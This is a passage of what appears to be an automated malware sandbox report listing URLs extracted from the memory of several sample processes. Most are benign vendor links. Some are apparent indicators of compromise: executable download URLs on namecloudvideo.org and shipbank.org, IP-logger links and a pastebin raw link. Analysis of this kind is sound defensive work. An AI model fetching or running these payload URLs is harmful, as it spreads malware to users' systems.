                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://download.opera.com/download/get/?partner=www&opsys=Windows&utm_source=netinstaller
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612770166.0000000001445000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612740729.000000000143F000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612370535.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/f
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612770166.0000000001445000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612740729.000000000143F000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612370535.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/n
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.0000000001368000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612370535.000000000144E000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612712820.000000000144E000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download3.operacdn.com/
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612370535.000000000144E000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612712820.000000000144E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download3.operacdn.com//
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000140B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download3.operacdn.com/9Z
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612370535.000000000144E000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612712820.000000000144E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download3.operacdn.com/=
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download3.operacdn.com/S
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612370535.0000000001437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download3.operacdn.com/ftp/pub/o
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2862191224.00000000044FE000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2854158568.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632215104.0000000000C66000.00000004.00000020.00020000.00000000.sdmp, 1EkTthwf6man8aNjDkP3iYby.exe, 0000002B.00000003.2598618953.00000000014A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download3.operacdn.com/ftp/pub/opera/desktop/108.0.5067.24/win/Opera_108.0.5067.24_Autoupdat
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://features.opera-api2.com/api/v2/features?country=%s&language=%s&uuid=%s&product=%s&channel=%s
                        Source: svchost.exe, 00000002.00000003.1744726219.000002557D4C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                        Source: svchost.exe, 00000002.00000003.1744726219.000002557D4FF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744726219.000002557D40E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                        Source: svchost.exe, 00000002.00000003.1744726219.000002557D4C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                        Source: svchost.exe, 00000002.00000003.1744726219.000002557D4A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744726219.000002557D507000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744726219.000002557D4F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                        Source: svchost.exe, 00000002.00000003.1744726219.000002557D4C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpString found in binary or memory: https://gamemaker.io
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpString found in binary or memory: https://gamemaker.io)
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpString found in binary or memory: https://gamemaker.io/en/education.
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpString found in binary or memory: https://gamemaker.io/en/get.
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpString found in binary or memory: https://help.instagram.com/581066165581870;
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://help.opera.com/latest/
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1luzz
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003799000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003254000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000325C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003382000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003376000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003799000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003254000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000325C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000329E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003382000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003376000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/privacy/
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003799000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003254000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000325C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000329E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003382000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003376000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/rules/
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DCA000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://legal.opera.com/eula/computers
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DCA000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://legal.opera.com/privacy
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpString found in binary or memory: https://legal.opera.com/privacy.
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DCA000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://legal.opera.com/terms
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DCA000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://legal.opera.com/terms.
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://namecloudvideo.org
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.000000000325C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003372000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000329E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000355A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000375B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://namecloudvideo.org/3eef203fb515bda85f514e168abb5973.exe
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003365000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003386000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003416000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003270000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://namecloudvideo.org/3eef203fb515bda85f514e168abb5973.exe4kz
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://namecloudvideo.org/3eef203fb515bda85f514e168abb5973.exeq
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.00000000036A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://net.geo.oper
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003282000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000034E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://net.geo.opera.com
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003386000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003270000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000033D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
                        Source: svchost.exe, 00000002.00000003.1744726219.000002557D4C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                        Source: svchost.exe, 00000002.00000003.1744726219.000002557D472000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://opera.com/privacy
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/HPj0MzD6
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpString found in binary or memory: https://policies.google.com/terms;
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://redir.opera.com/uninstallsurvey/
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3240139132.0000000035440000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2613936298.000000005DF34000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2924292015.000000005DEE0000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2880591845.000000005DE40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://redir.opera.com/www.opera.com/firstrun/?utm_campaign=767&utm_medium=apb&utm_source=mkt&http_
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shipbank.org
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000032A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000337A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shipbank.org/5150f22408eecb1d2cfd83c0e17fcd5e/3eef203fb515bda85f514e168abb5973.exe
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DCA000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://sourcecode.opera.com
                        Source: syncUpd.exe, 00000011.00000003.2938731044.0000000002300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: syncUpd.exe, 00000011.00000003.2938731044.0000000002300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                        Source: syncUpd.exe, 00000011.00000003.2256195948.0000000020D0D000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                        Source: syncUpd.exe, 00000011.00000003.2256195948.0000000020D0D000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpString found in binary or memory: https://telegram.org/tos/
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)cannot
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpString found in binary or memory: https://twitter.com/en/tos;
                        Source: fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1980476061.0000000002350000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1980573238.00000000020F4000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000002.3178613149.0000000002100000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000003.1993807685.00000000020AC000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000003.1993674545.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3173928635.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3173383330.000000000061A000.00000004.00000020.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000002.3176112237.0000000002130000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2051912319.0000000002360000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2052026418.0000000002124000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000003.2146250771.000000000213C000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000002.3180040054.0000000000858000.00000004.00000020.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000002.3191413694.0000000002148000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000003.2138969685.0000000003230000.00000004.00001000.00020000.00000000.sdmp, mlSjlt4YcfcpuVp4aQsoCouK.exe, 00000022.00000003.2270698416.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://vovsoft.com/contact/
